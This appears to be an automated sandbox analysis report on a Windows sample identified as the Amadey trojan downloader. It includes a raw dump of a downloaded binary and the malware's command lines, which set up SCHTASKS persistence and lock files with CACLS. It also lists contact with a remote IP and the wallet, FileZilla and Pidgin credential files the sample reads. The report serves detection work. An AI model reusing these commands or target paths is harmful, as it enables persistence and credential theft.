InternetReadFile Oct. 31, 2023, 5:42 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPEL /eà!Ðf à@@zÜzP°øÀÜÀnp0o@ H.text `.rdata@b d@@.datav@À.rsrcø°@@.relocÜÀ@Bj hèl¹pèOHh°è\SYÃÌÌÌj hm¹è/Hhè<SYÃÌÌÌjh0m¹ èHhpèSYÃÌÌÌjhHm¹¸èïGhÐèüRYÃÌÌÌjhem¹ÐèÏGh0èÜRYÃÌÌÌjhem¹èè¯Ghè¼RYÃÌÌÌjhem¹èGhðèRYÃÌÌÌjhem¹èoGhPè\|RYÃÌÌÌh°èmRYÃÌÌÌÌhè]RYÃÌÌÌÌhpèMRYÃÌÌÌÌj?hðm¹xèGhÐè,RYÃÌÌÌh°èRYÃÌÌÌÌhPè RYÃÌÌÌÌhðèýQYÃÌÌÌÌhèíQYÃÌÌÌÌh0èÝQYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPè[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!PèC[ÄöEtjVèûMÄÆ^]ÂAÇÔ!Pè[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿh(zEôPèëZÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèBZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hhmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèþDjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPèDMüE9MÇE¬BM}QCEMPÇE°ÆEèæC}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè[jMÄ3uÀÄÆëÆE¼Mäÿu¼SèIG}E°ør+HÇùrüÁ#+ÇÀüøQWèKÄUúr,MBÁúrIüÂ#+ÁÀüødRQèÓJÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQè;JEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèóIÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQègIÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhemÇCÇCÆèMAUúr(MBÁúrIüÂ#+ÁÀüøwbRQèÑHÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèHÄ_^Ã[å]Ãè nÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVhem3Ûè@ÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèvAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèdGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèñFÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQè¯FÄÿtuøéoþÿÿ_^[å]ÃèÃlÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèN>Eà×PMÈèÀ?ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè¸EÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQèVEÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃèkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè =}EÿuCE¹0Pèô<5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc000c	1	1	0

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	CACLS "Utsysc.exe" /P "test22:R" /E
cmdline	netsh wlan show profiles
cmdline	"C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	CACLS "Utsysc.exe" /P "test22:N"

Communicates with host for which no DNS query was performed (1 event)

host

185.196.8.176

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets
file	C:\Users\test22\AppData\Roaming\Litecoin\wallets

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml

Harvests information related to installed instant messenger clients (19 events)

file	C:\Windows\.purple\accounts.xml
file	C:\util\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final\.purple\accounts.xml
file	C:\Windows\System32\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\.purple\accounts.xml
file	C:\Program Files\Windows Photo Viewer\.purple\accounts.xml
file	C:\.purple\accounts.xml
file	C:\SystemRoot\System32\.purple\accounts.xml
file	C:\Program Files\_Sandboxie\.purple\accounts.xml
file	C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file	C:\Program Files\Windows NT\Accessories\.purple\accounts.xml
file	C:\util\.purple\accounts.xml
file	C:\Python27\.purple\accounts.xml
file	C:\Program Files (x86)\Microsoft Office\Office12\.purple\accounts.xml
file	C:\Users\test22\Downloads\.purple\accounts.xml
file	C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file	C:\Program Files (x86)\Hnc\Hwp80\.purple\accounts.xml
file	C:\Program Files\_Wireshark\.purple\accounts.xml
file	C:\Windows\SysWOW64\.purple\accounts.xml
file	C:\Program Files (x86)\EditPlus\.purple\accounts.xml

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\ea7c8244c8" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	CACLS "..\ea7c8244c8" /P "test22:R" /E
cmdline	CACLS "Utsysc.exe" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	CACLS "Utsysc.exe" /P "test22:N"

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Deyma.4!c
Elastic	Windows.Trojan.Amadey
DrWeb	Trojan.Siggen21.44100
MicroWorld-eScan	Gen:Variant.Zusy.446510
FireEye	Generic.mg.b6d627dcf04d0488
Skyhigh	BehavesLike.Win32.Downloader.fh
ALYac	Gen:Variant.Zusy.446510
Malwarebytes	Spyware.Amadey
Zillya	Downloader.Amadey.Win32.286
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan-Downloader ( 005790d31 )
BitDefender	Gen:Variant.Zusy.446510
K7GW	Trojan-Downloader ( 005790d31 )
Cybereason	malicious.d6f200
BitDefenderTheta	Gen:NN.ZexaF.36792.tuW@a0HJc@fi
VirIT	Trojan.Win32.Genus.TTW
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.A
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-Downloader.Win32.Deyma.gen
Alibaba	TrojanDownloader:Win32/Amadey.29bf597d
ViRobot	Trojan.Win.Z.Amadey.314368.B
Rising	Downloader.Amadey!8.125AC (TFE:5:046sIl9HhmS)
Emsisoft	Gen:Variant.Zusy.446510 (B)
VIPRE	Gen:Variant.Zusy.446510
TrendMicro	Trojan.Win32.AMADEY.YXDJ5Z
Sophos	Mal/Amadey-C
SentinelOne	Static AI - Malicious PE
GData	Win32.Trojan-Downloader.Amadey.D
Google	Detected
MAX	malware (ai score=89)
Antiy-AVL	Trojan[Downloader]/Win32.Amadey
Kingsoft	malware.kb.a.951
Gridinsoft	Trojan.Win32.Amadey.bot
Arcabit	Trojan.Zusy.D6D02E
ZoneAlarm	HEUR:Trojan-Downloader.Win32.Deyma.gen
Microsoft	Trojan:Win32/Amadey.AM!MTB
Varist	W32/Amadey.C1.gen!Eldorado
AhnLab-V3	Malware/Win.Trojanspy.C5238800
McAfee	Downloader-FCND!B6D627DCF04D
DeepInstinct	MALICIOUS
Cylance	unsafe
Panda	Trj/Chgt.AD
Tencent	Malware.Win32.Gencirc.13f2b747
Ikarus	Trojan.Win32.Amadey
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Amadey.A!tr
AVG	Win32:DropperX-gen [Drp]

abd.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All